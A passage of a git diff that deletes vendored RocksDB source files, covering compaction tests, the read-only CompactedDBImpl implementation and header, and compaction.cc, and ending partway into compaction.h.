-  options.delete_obsolete_files_period_micros = 0;
-
-  // Add listener.
-  FlushedFileCollector* collector = new FlushedFileCollector();
-  options.listeners.emplace_back(collector);
-
-  DB* db = nullptr;
-  DestroyDB(db_name_, options);
-  Status s = DB::Open(options, db_name_, &db);
-  assert(s.ok());
-  assert(db);
-
-  // Create 5 files.
-  for (int i = 0; i < 5; ++i) {
-    db->Put(WriteOptions(), "key" + ToString(i), "value");
-    db->Flush(FlushOptions());
-  }
-
-  auto l0_files = collector->GetFlushedFiles();
-  EXPECT_EQ(5, l0_files.size());
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"CompactFilesImpl:2", "CompactFilesTest.CapturingPendingFiles:0"},
-      {"CompactFilesTest.CapturingPendingFiles:1", "CompactFilesImpl:3"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Start compacting files.
-  rocksdb::port::Thread compaction_thread(
-      [&] { EXPECT_OK(db->CompactFiles(CompactionOptions(), l0_files, 1)); });
-
-  // In the meantime flush another file.
-  TEST_SYNC_POINT("CompactFilesTest.CapturingPendingFiles:0");
-  db->Put(WriteOptions(), "key5", "value");
-  db->Flush(FlushOptions());
-  TEST_SYNC_POINT("CompactFilesTest.CapturingPendingFiles:1");
-
-  compaction_thread.join();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  delete db;
-
-  // Make sure we can reopen the DB.
-  s = DB::Open(options, db_name_, &db);
-  ASSERT_TRUE(s.ok());
-  assert(db);
-  delete db;
-}
-
-TEST_F(CompactFilesTest, CompactionFilterWithGetSv) {
-  class FilterWithGet : public CompactionFilter {
-   public:
-    virtual bool Filter(int level, const Slice& key, const Slice& value,
-                        std::string* new_value,
-                        bool* value_changed) const override {
-      if (db_ == nullptr) {
-        return true;
-      }
-      std::string res;
-      db_->Get(ReadOptions(), "", &res);
-      return true;
-    }
-
-    void SetDB(DB* db) {
-      db_ = db;
-    }
-
-    virtual const char* Name() const override { return "FilterWithGet"; }
-
-   private:
-    DB* db_;
-  };
-
-
-  std::shared_ptr<FilterWithGet> cf(new FilterWithGet());
-
-  Options options;
-  options.create_if_missing = true;
-  options.compaction_filter = cf.get();
-
-  DB* db = nullptr;
-  DestroyDB(db_name_, options);
-  Status s = DB::Open(options, db_name_, &db);
-  ASSERT_OK(s);
-
-  cf->SetDB(db);
-
-  // Write one L0 file
-  db->Put(WriteOptions(), "K1", "V1");
-  db->Flush(FlushOptions());
-
-  // Compact all L0 files using CompactFiles
-  rocksdb::ColumnFamilyMetaData meta;
-  db->GetColumnFamilyMetaData(&meta);
-  for (auto& file : meta.levels[0].files) {
-    std::string fname = file.db_path + "/" + file.name;
-    ASSERT_OK(
-        db->CompactFiles(rocksdb::CompactionOptions(), {fname}, 0));
-  }
-
-
-  delete db;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as DBImpl::CompactFiles is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/compacted_db_impl.cc b/thirdparty/rocksdb/db/compacted_db_impl.cc
deleted file mode 100644
index d1007d9..0000000
--- a/thirdparty/rocksdb/db/compacted_db_impl.cc
+++ /dev/null
@@ -1,166 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include "db/compacted_db_impl.h"
-#include "db/db_impl.h"
-#include "db/version_set.h"
-#include "table/get_context.h"
-
-namespace rocksdb {
-
-extern void MarkKeyMayExist(void* arg);
-extern bool SaveValue(void* arg, const ParsedInternalKey& parsed_key,
-                      const Slice& v, bool hit_and_return);
-
-CompactedDBImpl::CompactedDBImpl(
-  const DBOptions& options, const std::string& dbname)
-  : DBImpl(options, dbname) {
-}
-
-CompactedDBImpl::~CompactedDBImpl() {
-}
-
-size_t CompactedDBImpl::FindFile(const Slice& key) {
-  size_t left = 0;
-  size_t right = files_.num_files - 1;
-  while (left < right) {
-    size_t mid = (left + right) >> 1;
-    const FdWithKeyRange& f = files_.files[mid];
-    if (user_comparator_->Compare(ExtractUserKey(f.largest_key), key) < 0) {
-      // Key at "mid.largest" is < "target".  Therefore all
-      // files at or before "mid" are uninteresting.
-      left = mid + 1;
-    } else {
-      // Key at "mid.largest" is >= "target".  Therefore all files
-      // after "mid" are uninteresting.
-      right = mid;
-    }
-  }
-  return right;
-}
-
-Status CompactedDBImpl::Get(const ReadOptions& options, ColumnFamilyHandle*,
-                            const Slice& key, PinnableSlice* value) {
-  GetContext get_context(user_comparator_, nullptr, nullptr, nullptr,
-                         GetContext::kNotFound, key, value, nullptr, nullptr,
-                         nullptr, nullptr);
-  LookupKey lkey(key, kMaxSequenceNumber);
-  files_.files[FindFile(key)].fd.table_reader->Get(
-      options, lkey.internal_key(), &get_context);
-  if (get_context.State() == GetContext::kFound) {
-    return Status::OK();
-  }
-  return Status::NotFound();
-}
-
-std::vector<Status> CompactedDBImpl::MultiGet(const ReadOptions& options,
-    const std::vector<ColumnFamilyHandle*>&,
-    const std::vector<Slice>& keys, std::vector<std::string>* values) {
-  autovector<TableReader*, 16> reader_list;
-  for (const auto& key : keys) {
-    const FdWithKeyRange& f = files_.files[FindFile(key)];
-    if (user_comparator_->Compare(key, ExtractUserKey(f.smallest_key)) < 0) {
-      reader_list.push_back(nullptr);
-    } else {
-      LookupKey lkey(key, kMaxSequenceNumber);
-      f.fd.table_reader->Prepare(lkey.internal_key());
-      reader_list.push_back(f.fd.table_reader);
-    }
-  }
-  std::vector<Status> statuses(keys.size(), Status::NotFound());
-  values->resize(keys.size());
-  int idx = 0;
-  for (auto* r : reader_list) {
-    if (r != nullptr) {
-      PinnableSlice pinnable_val;
-      std::string& value = (*values)[idx];
-      GetContext get_context(user_comparator_, nullptr, nullptr, nullptr,
-                             GetContext::kNotFound, keys[idx], &pinnable_val,
-                             nullptr, nullptr, nullptr, nullptr);
-      LookupKey lkey(keys[idx], kMaxSequenceNumber);
-      r->Get(options, lkey.internal_key(), &get_context);
-      value.assign(pinnable_val.data(), pinnable_val.size());
-      if (get_context.State() == GetContext::kFound) {
-        statuses[idx] = Status::OK();
-      }
-    }
-    ++idx;
-  }
-  return statuses;
-}
-
-Status CompactedDBImpl::Init(const Options& options) {
-  mutex_.Lock();
-  ColumnFamilyDescriptor cf(kDefaultColumnFamilyName,
-                            ColumnFamilyOptions(options));
-  Status s = Recover({cf}, true /* read only */, false, true);
-  if (s.ok()) {
-    cfd_ = reinterpret_cast<ColumnFamilyHandleImpl*>(
-              DefaultColumnFamily())->cfd();
-    delete cfd_->InstallSuperVersion(new SuperVersion(), &mutex_);
-  }
-  mutex_.Unlock();
-  if (!s.ok()) {
-    return s;
-  }
-  NewThreadStatusCfInfo(cfd_);
-  version_ = cfd_->GetSuperVersion()->current;
-  user_comparator_ = cfd_->user_comparator();
-  auto* vstorage = version_->storage_info();
-  if (vstorage->num_non_empty_levels() == 0) {
-    return Status::NotSupported("no file exists");
-  }
-  const LevelFilesBrief& l0 = vstorage->LevelFilesBrief(0);
-  // L0 should not have files
-  if (l0.num_files > 1) {
-    return Status::NotSupported("L0 contain more than 1 file");
-  }
-  if (l0.num_files == 1) {
-    if (vstorage->num_non_empty_levels() > 1) {
-      return Status::NotSupported("Both L0 and other level contain files");
-    }
-    files_ = l0;
-    return Status::OK();
-  }
-
-  for (int i = 1; i < vstorage->num_non_empty_levels() - 1; ++i) {
-    if (vstorage->LevelFilesBrief(i).num_files > 0) {
-      return Status::NotSupported("Other levels also contain files");
-    }
-  }
-
-  int level = vstorage->num_non_empty_levels() - 1;
-  if (vstorage->LevelFilesBrief(level).num_files > 0) {
-    files_ = vstorage->LevelFilesBrief(level);
-    return Status::OK();
-  }
-  return Status::NotSupported("no file exists");
-}
-
-Status CompactedDBImpl::Open(const Options& options,
-                             const std::string& dbname, DB** dbptr) {
-  *dbptr = nullptr;
-
-  if (options.max_open_files != -1) {
-    return Status::InvalidArgument("require max_open_files = -1");
-  }
-  if (options.merge_operator.get() != nullptr) {
-    return Status::InvalidArgument("merge operator is not supported");
-  }
-  DBOptions db_options(options);
-  std::unique_ptr<CompactedDBImpl> db(new CompactedDBImpl(db_options, dbname));
-  Status s = db->Init(options);
-  if (s.ok()) {
-    ROCKS_LOG_INFO(db->immutable_db_options_.info_log,
-                   "Opened the db as fully compacted mode");
-    LogFlush(db->immutable_db_options_.info_log);
-    *dbptr = db.release();
-  }
-  return s;
-}
-
-}   // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/compacted_db_impl.h b/thirdparty/rocksdb/db/compacted_db_impl.h
deleted file mode 100644
index de32f21..0000000
--- a/thirdparty/rocksdb/db/compacted_db_impl.h
+++ /dev/null
@@ -1,102 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include "db/db_impl.h"
-#include <vector>
-#include <string>
-
-namespace rocksdb {
-
-class CompactedDBImpl : public DBImpl {
- public:
-  CompactedDBImpl(const DBOptions& options, const std::string& dbname);
-  virtual ~CompactedDBImpl();
-
-  static Status Open(const Options& options, const std::string& dbname,
-                     DB** dbptr);
-
-  // Implementations of the DB interface
-  using DB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override;
-  using DB::MultiGet;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>&,
-      const std::vector<Slice>& keys, std::vector<std::string>* values)
-    override;
-
-  using DBImpl::Put;
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  using DBImpl::Merge;
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  using DBImpl::Delete;
-  virtual Status Delete(const WriteOptions& options,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  virtual Status Write(const WriteOptions& options,
-                       WriteBatch* updates) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  using DBImpl::CompactRange;
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice* begin, const Slice* end) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-
-  virtual Status DisableFileDeletions() override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  virtual Status EnableFileDeletions(bool force) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  virtual Status GetLiveFiles(std::vector<std::string>&,
-                              uint64_t* manifest_file_size,
-                              bool flush_memtable = true) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  using DBImpl::Flush;
-  virtual Status Flush(const FlushOptions& options,
-                       ColumnFamilyHandle* column_family) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-  using DB::IngestExternalFile;
-  virtual Status IngestExternalFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& ingestion_options) override {
-    return Status::NotSupported("Not supported in compacted db mode.");
-  }
-
- private:
-  friend class DB;
-  inline size_t FindFile(const Slice& key);
-  Status Init(const Options& options);
-
-  ColumnFamilyData* cfd_;
-  Version* version_;
-  const Comparator* user_comparator_;
-  LevelFilesBrief files_;
-
-  // No copying allowed
-  CompactedDBImpl(const CompactedDBImpl&);
-  void operator=(const CompactedDBImpl&);
-};
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/compaction.cc b/thirdparty/rocksdb/db/compaction.cc
deleted file mode 100644
index 706eb3b..0000000
--- a/thirdparty/rocksdb/db/compaction.cc
+++ /dev/null
@@ -1,480 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/compaction.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <vector>
-
-#include "db/column_family.h"
-#include "rocksdb/compaction_filter.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-uint64_t TotalFileSize(const std::vector<FileMetaData*>& files) {
-  uint64_t sum = 0;
-  for (size_t i = 0; i < files.size() && files[i]; i++) {
-    sum += files[i]->fd.GetFileSize();
-  }
-  return sum;
-}
-
-void Compaction::SetInputVersion(Version* _input_version) {
-  input_version_ = _input_version;
-  cfd_ = input_version_->cfd();
-
-  cfd_->Ref();
-  input_version_->Ref();
-  edit_.SetColumnFamily(cfd_->GetID());
-}
-
-void Compaction::GetBoundaryKeys(
-    VersionStorageInfo* vstorage,
-    const std::vector<CompactionInputFiles>& inputs, Slice* smallest_user_key,
-    Slice* largest_user_key) {
-  bool initialized = false;
-  const Comparator* ucmp = vstorage->InternalComparator()->user_comparator();
-  for (size_t i = 0; i < inputs.size(); ++i) {
-    if (inputs[i].files.empty()) {
-      continue;
-    }
-    if (inputs[i].level == 0) {
-      // we need to consider all files on level 0
-      for (const auto* f : inputs[i].files) {
-        const Slice& start_user_key = f->smallest.user_key();
-        if (!initialized ||
-            ucmp->Compare(start_user_key, *smallest_user_key) < 0) {
-          *smallest_user_key = start_user_key;
-        }
-        const Slice& end_user_key = f->largest.user_key();
-        if (!initialized ||
-            ucmp->Compare(end_user_key, *largest_user_key) > 0) {
-          *largest_user_key = end_user_key;
-        }
-        initialized = true;
-      }
-    } else {
-      // we only need to consider the first and last file
-      const Slice& start_user_key = inputs[i].files[0]->smallest.user_key();
-      if (!initialized ||
-          ucmp->Compare(start_user_key, *smallest_user_key) < 0) {
-        *smallest_user_key = start_user_key;
-      }
-      const Slice& end_user_key = inputs[i].files.back()->largest.user_key();
-      if (!initialized || ucmp->Compare(end_user_key, *largest_user_key) > 0) {
-        *largest_user_key = end_user_key;
-      }
-      initialized = true;
-    }
-  }
-}
-
-// helper function to determine if compaction is creating files at the
-// bottommost level
-bool Compaction::IsBottommostLevel(
-    int output_level, VersionStorageInfo* vstorage,
-    const std::vector<CompactionInputFiles>& inputs) {
-  if (inputs[0].level == 0 &&
-      inputs[0].files.back() != vstorage->LevelFiles(0).back()) {
-    return false;
-  }
-
-  Slice smallest_key, largest_key;
-  GetBoundaryKeys(vstorage, inputs, &smallest_key, &largest_key);
-
-  // Checks whether there are files living beyond the output_level.
-  // If lower levels have files, it checks for overlap between files
-  // if the compaction process and those files.
-  // Bottomlevel optimizations can be made if there are no files in
-  // lower levels or if there is no overlap with the files in
-  // the lower levels.
-  for (int i = output_level + 1; i < vstorage->num_levels(); i++) {
-    // It is not the bottommost level if there are files in higher
-    // levels when the output level is 0 or if there are files in
-    // higher levels which overlap with files to be compacted.
-    // output_level == 0 means that we want it to be considered
-    // s the bottommost level only if the last file on the level
-    // is a part of the files to be compacted - this is verified by
-    // the first if condition in this function
-    if (vstorage->NumLevelFiles(i) > 0 &&
-        (output_level == 0 ||
-         vstorage->OverlapInLevel(i, &smallest_key, &largest_key))) {
-      return false;
-    }
-  }
-  return true;
-}
-
-// test function to validate the functionality of IsBottommostLevel()
-// function -- determines if compaction with inputs and storage is bottommost
-bool Compaction::TEST_IsBottommostLevel(
-    int output_level, VersionStorageInfo* vstorage,
-    const std::vector<CompactionInputFiles>& inputs) {
-  return IsBottommostLevel(output_level, vstorage, inputs);
-}
-
-bool Compaction::IsFullCompaction(
-    VersionStorageInfo* vstorage,
-    const std::vector<CompactionInputFiles>& inputs) {
-  size_t num_files_in_compaction = 0;
-  size_t total_num_files = 0;
-  for (int l = 0; l < vstorage->num_levels(); l++) {
-    total_num_files += vstorage->NumLevelFiles(l);
-  }
-  for (size_t i = 0; i < inputs.size(); i++) {
-    num_files_in_compaction += inputs[i].size();
-  }
-  return num_files_in_compaction == total_num_files;
-}
-
-Compaction::Compaction(VersionStorageInfo* vstorage,
-                       const ImmutableCFOptions& _immutable_cf_options,
-                       const MutableCFOptions& _mutable_cf_options,
-                       std::vector<CompactionInputFiles> _inputs,
-                       int _output_level, uint64_t _target_file_size,
-                       uint64_t _max_compaction_bytes, uint32_t _output_path_id,
-                       CompressionType _compression,
-                       std::vector<FileMetaData*> _grandparents,
-                       bool _manual_compaction, double _score,
-                       bool _deletion_compaction,
-                       CompactionReason _compaction_reason)
-    : input_vstorage_(vstorage),
-      start_level_(_inputs[0].level),
-      output_level_(_output_level),
-      max_output_file_size_(_target_file_size),
-      max_compaction_bytes_(_max_compaction_bytes),
-      immutable_cf_options_(_immutable_cf_options),
-      mutable_cf_options_(_mutable_cf_options),
-      input_version_(nullptr),
-      number_levels_(vstorage->num_levels()),
-      cfd_(nullptr),
-      output_path_id_(_output_path_id),
-      output_compression_(_compression),
-      deletion_compaction_(_deletion_compaction),
-      inputs_(std::move(_inputs)),
-      grandparents_(std::move(_grandparents)),
-      score_(_score),
-      bottommost_level_(IsBottommostLevel(output_level_, vstorage, inputs_)),
-      is_full_compaction_(IsFullCompaction(vstorage, inputs_)),
-      is_manual_compaction_(_manual_compaction),
-      is_trivial_move_(false),
-      compaction_reason_(_compaction_reason) {
-  MarkFilesBeingCompacted(true);
-  if (is_manual_compaction_) {
-    compaction_reason_ = CompactionReason::kManualCompaction;
-  }
-
-#ifndef NDEBUG
-  for (size_t i = 1; i < inputs_.size(); ++i) {
-    assert(inputs_[i].level > inputs_[i - 1].level);
-  }
-#endif
-
-  // setup input_levels_
-  {
-    input_levels_.resize(num_input_levels());
-    for (size_t which = 0; which < num_input_levels(); which++) {
-      DoGenerateLevelFilesBrief(&input_levels_[which], inputs_[which].files,
-                                &arena_);
-    }
-  }
-
-  GetBoundaryKeys(vstorage, inputs_, &smallest_user_key_, &largest_user_key_);
-}
-
-Compaction::~Compaction() {
-  if (input_version_ != nullptr) {
-    input_version_->Unref();
-  }
-  if (cfd_ != nullptr) {
-    if (cfd_->Unref()) {
-      delete cfd_;
-    }
-  }
-}
-
-bool Compaction::InputCompressionMatchesOutput() const {
-  int base_level = input_vstorage_->base_level();
-  bool matches = (GetCompressionType(immutable_cf_options_, input_vstorage_,
-                                     mutable_cf_options_, start_level_,
-                                     base_level) == output_compression_);
-  if (matches) {
-    TEST_SYNC_POINT("Compaction::InputCompressionMatchesOutput:Matches");
-    return true;
-  }
-  TEST_SYNC_POINT("Compaction::InputCompressionMatchesOutput:DidntMatch");
-  return matches;
-}
-
-bool Compaction::IsTrivialMove() const {
-  // Avoid a move if there is lots of overlapping grandparent data.
-  // Otherwise, the move could create a parent file that will require
-  // a very expensive merge later on.
-  // If start_level_== output_level_, the purpose is to force compaction
-  // filter to be applied to that level, and thus cannot be a trivial move.
-
-  // Check if start level have files with overlapping ranges
-  if (start_level_ == 0 && input_vstorage_->level0_non_overlapping() == false) {
-    // We cannot move files from L0 to L1 if the files are overlapping
-    return false;
-  }
-
-  if (is_manual_compaction_ &&
-      (immutable_cf_options_.compaction_filter != nullptr ||
-       immutable_cf_options_.compaction_filter_factory != nullptr)) {
-    // This is a manual compaction and we have a compaction filter that should
-    // be executed, we cannot do a trivial move
-    return false;
-  }
-
-  // Used in universal compaction, where trivial move can be done if the
-  // input files are non overlapping
-  if ((immutable_cf_options_.compaction_options_universal.allow_trivial_move) &&
-      (output_level_ != 0)) {
-    return is_trivial_move_;
-  }
-
-  if (!(start_level_ != output_level_ && num_input_levels() == 1 &&
-          input(0, 0)->fd.GetPathId() == output_path_id() &&
-          InputCompressionMatchesOutput())) {
-    return false;
-  }
-
-  // assert inputs_.size() == 1
-
-  for (const auto& file : inputs_.front().files) {
-    std::vector<FileMetaData*> file_grand_parents;
-    if (output_level_ + 1 >= number_levels_) {
-      continue;
-    }
-    input_vstorage_->GetOverlappingInputs(output_level_ + 1, &file->smallest,
-                                          &file->largest, &file_grand_parents);
-    const auto compaction_size =
-        file->fd.GetFileSize() + TotalFileSize(file_grand_parents);
-    if (compaction_size > max_compaction_bytes_) {
-      return false;
-    }
-  }
-
-  return true;
-}
-
-void Compaction::AddInputDeletions(VersionEdit* out_edit) {
-  for (size_t which = 0; which < num_input_levels(); which++) {
-    for (size_t i = 0; i < inputs_[which].size(); i++) {
-      out_edit->DeleteFile(level(which), inputs_[which][i]->fd.GetNumber());
-    }
-  }
-}
-
-bool Compaction::KeyNotExistsBeyondOutputLevel(
-    const Slice& user_key, std::vector<size_t>* level_ptrs) const {
-  assert(input_version_ != nullptr);
-  assert(level_ptrs != nullptr);
-  assert(level_ptrs->size() == static_cast<size_t>(number_levels_));
-  if (cfd_->ioptions()->compaction_style == kCompactionStyleLevel) {
-    if (output_level_ == 0) {
-      return false;
-    }
-    // Maybe use binary search to find right entry instead of linear search?
-    const Comparator* user_cmp = cfd_->user_comparator();
-    for (int lvl = output_level_ + 1; lvl < number_levels_; lvl++) {
-      const std::vector<FileMetaData*>& files =
-          input_vstorage_->LevelFiles(lvl);
-      for (; level_ptrs->at(lvl) < files.size(); level_ptrs->at(lvl)++) {
-        auto* f = files[level_ptrs->at(lvl)];
-        if (user_cmp->Compare(user_key, f->largest.user_key()) <= 0) {
-          // We've advanced far enough
-          if (user_cmp->Compare(user_key, f->smallest.user_key()) >= 0) {
-            // Key falls in this file's range, so definitely
-            // exists beyond output level
-            return false;
-          }
-          break;
-        }
-      }
-    }
-    return true;
-  } else {
-    return bottommost_level_;
-  }
-}
-
-// Mark (or clear) each file that is being compacted
-void Compaction::MarkFilesBeingCompacted(bool mark_as_compacted) {
-  for (size_t i = 0; i < num_input_levels(); i++) {
-    for (size_t j = 0; j < inputs_[i].size(); j++) {
-      assert(mark_as_compacted ? !inputs_[i][j]->being_compacted
-                               : inputs_[i][j]->being_compacted);
-      inputs_[i][j]->being_compacted = mark_as_compacted;
-    }
-  }
-}
-
-// Sample output:
-// If compacting 3 L0 files, 2 L3 files and 1 L4 file, and outputting to L5,
-// print: "3@0 + 2@3 + 1@4 files to L5"
-const char* Compaction::InputLevelSummary(
-    InputLevelSummaryBuffer* scratch) const {
-  int len = 0;
-  bool is_first = true;
-  for (auto& input_level : inputs_) {
-    if (input_level.empty()) {
-      continue;
-    }
-    if (!is_first) {
-      len +=
-          snprintf(scratch->buffer + len, sizeof(scratch->buffer) - len, " + ");
-    } else {
-      is_first = false;
-    }
-    len += snprintf(scratch->buffer + len, sizeof(scratch->buffer) - len,
-                    "%" ROCKSDB_PRIszt "@%d", input_level.size(),
-                    input_level.level);
-  }
-  snprintf(scratch->buffer + len, sizeof(scratch->buffer) - len,
-           " files to L%d", output_level());
-
-  return scratch->buffer;
-}
-
-uint64_t Compaction::CalculateTotalInputSize() const {
-  uint64_t size = 0;
-  for (auto& input_level : inputs_) {
-    for (auto f : input_level.files) {
-      size += f->fd.GetFileSize();
-    }
-  }
-  return size;
-}
-
-void Compaction::ReleaseCompactionFiles(Status status) {
-  MarkFilesBeingCompacted(false);
-  cfd_->compaction_picker()->ReleaseCompactionFiles(this, status);
-}
-
-void Compaction::ResetNextCompactionIndex() {
-  assert(input_version_ != nullptr);
-  input_vstorage_->ResetNextCompactionIndex(start_level_);
-}
-
-namespace {
-int InputSummary(const std::vector<FileMetaData*>& files, char* output,
-                 int len) {
-  *output = '\0';
-  int write = 0;
-  for (size_t i = 0; i < files.size(); i++) {
-    int sz = len - write;
-    int ret;
-    char sztxt[16];
-    AppendHumanBytes(files.at(i)->fd.GetFileSize(), sztxt, 16);
-    ret = snprintf(output + write, sz, "%" PRIu64 "(%s) ",
-                   files.at(i)->fd.GetNumber(), sztxt);
-    if (ret < 0 || ret >= sz) break;
-    write += ret;
-  }
-  // if files.size() is non-zero, overwrite the last space
-  return write - !!files.size();
-}
-}  // namespace
-
-void Compaction::Summary(char* output, int len) {
-  int write =
-      snprintf(output, len, "Base version %" PRIu64 " Base level %d, inputs: [",
-               input_version_->GetVersionNumber(), start_level_);
-  if (write < 0 || write >= len) {
-    return;
-  }
-
-  for (size_t level_iter = 0; level_iter < num_input_levels(); ++level_iter) {
-    if (level_iter > 0) {
-      write += snprintf(output + write, len - write, "], [");
-      if (write < 0 || write >= len) {
-        return;
-      }
-    }
-    write +=
-        InputSummary(inputs_[level_iter].files, output + write, len - write);
-    if (write < 0 || write >= len) {
-      return;
-    }
-  }
-
-  snprintf(output + write, len - write, "]");
-}
-
-uint64_t Compaction::OutputFilePreallocationSize() const {
-  uint64_t preallocation_size = 0;
-
-  if (max_output_file_size_ != port::kMaxUint64 &&
-      (cfd_->ioptions()->compaction_style == kCompactionStyleLevel ||
-       output_level() > 0)) {
-    preallocation_size = max_output_file_size_;
-  } else {
-    for (const auto& level_files : inputs_) {
-      for (const auto& file : level_files.files) {
-        preallocation_size += file->fd.GetFileSize();
-      }
-    }
-  }
-  // Over-estimate slightly so we don't end up just barely crossing
-  // the threshold
-  return preallocation_size + (preallocation_size / 10);
-}
-
-std::unique_ptr<CompactionFilter> Compaction::CreateCompactionFilter() const {
-  if (!cfd_->ioptions()->compaction_filter_factory) {
-    return nullptr;
-  }
-
-  CompactionFilter::Context context;
-  context.is_full_compaction = is_full_compaction_;
-  context.is_manual_compaction = is_manual_compaction_;
-  context.column_family_id = cfd_->GetID();
-  return cfd_->ioptions()->compaction_filter_factory->CreateCompactionFilter(
-      context);
-}
-
-bool Compaction::IsOutputLevelEmpty() const {
-  return inputs_.back().level != output_level_ || inputs_.back().empty();
-}
-
-bool Compaction::ShouldFormSubcompactions() const {
-  if (immutable_cf_options_.max_subcompactions <= 1 || cfd_ == nullptr) {
-    return false;
-  }
-  if (cfd_->ioptions()->compaction_style == kCompactionStyleLevel) {
-    return start_level_ == 0 && output_level_ > 0 && !IsOutputLevelEmpty();
-  } else if (cfd_->ioptions()->compaction_style == kCompactionStyleUniversal) {
-    return number_levels_ > 1 && output_level_ > 0;
-  } else {
-    return false;
-  }
-}
-
-uint64_t Compaction::MaxInputFileCreationTime() const {
-  uint64_t max_creation_time = 0;
-  for (const auto& file : inputs_[0].files) {
-    if (file->fd.table_reader != nullptr &&
-        file->fd.table_reader->GetTableProperties() != nullptr) {
-      uint64_t creation_time =
-          file->fd.table_reader->GetTableProperties()->creation_time;
-      max_creation_time = std::max(max_creation_time, creation_time);
-    }
-  }
-  return max_creation_time;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction.h b/thirdparty/rocksdb/db/compaction.h
deleted file mode 100644
index 7be6df2..0000000
--- a/thirdparty/rocksdb/db/compaction.h
+++ /dev/null
@@ -1,325 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include "db/version_set.h"
-#include "options/cf_options.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-// The structure that manages compaction input files associated
-// with the same physical level.
-struct CompactionInputFiles {
-  int level;
-  std::vector<FileMetaData*> files;
-  inline bool empty() const { return files.empty(); }
-  inline size_t size() const { return files.size(); }
-  inline void clear() { files.clear(); }
-  inline FileMetaData* operator[](size_t i) const { return files[i]; }
-};
-
-class Version;
-class ColumnFamilyData;
-class VersionStorageInfo;
-class CompactionFilter;
-
-// A Compaction encapsulates information about a compaction.
-class Compaction {
- public:
-  Compaction(VersionStorageInfo* input_version,
-             const ImmutableCFOptions& immutable_cf_options,
-             const MutableCFOptions& mutable_cf_options,
-             std::vector<CompactionInputFiles> inputs, int output_level,
-             uint64_t target_file_size, uint64_t max_compaction_bytes,
-             uint32_t output_path_id, CompressionType compression,
-             std::vector<FileMetaData*> grandparents,
-             bool manual_compaction = false, double score = -1,
-             bool deletion_compaction = false,
-             CompactionReason compaction_reason = CompactionReason::kUnknown);
-
-  // No copying allowed
-  Compaction(const Compaction&) = delete;
-  void operator=(const Compaction&) = delete;
-
-  ~Compaction();
-
-  // Returns the level associated to the specified compaction input level.
-  // If compaction_input_level is not specified, then input_level is set to 0.
-  int level(size_t compaction_input_level = 0) const {
-    return inputs_[compaction_input_level].level;
-  }
-
-  int start_level() const { return start_level_; }
-
-  // Outputs will go to this level
-  int output_level() const { return output_level_; }
-
-  // Returns the number of input levels in this compaction.
-  size_t num_input_levels() const { return inputs_.size(); }
-
-  // Return the object that holds the edits to the descriptor done
-  // by this compaction.
-  VersionEdit* edit() { return &edit_; }
-
-  // Returns the number of input files associated to the specified
-  // compaction input level.
-  // The function will return 0 if when "compaction_input_level" < 0
-  // or "compaction_input_level" >= "num_input_levels()".
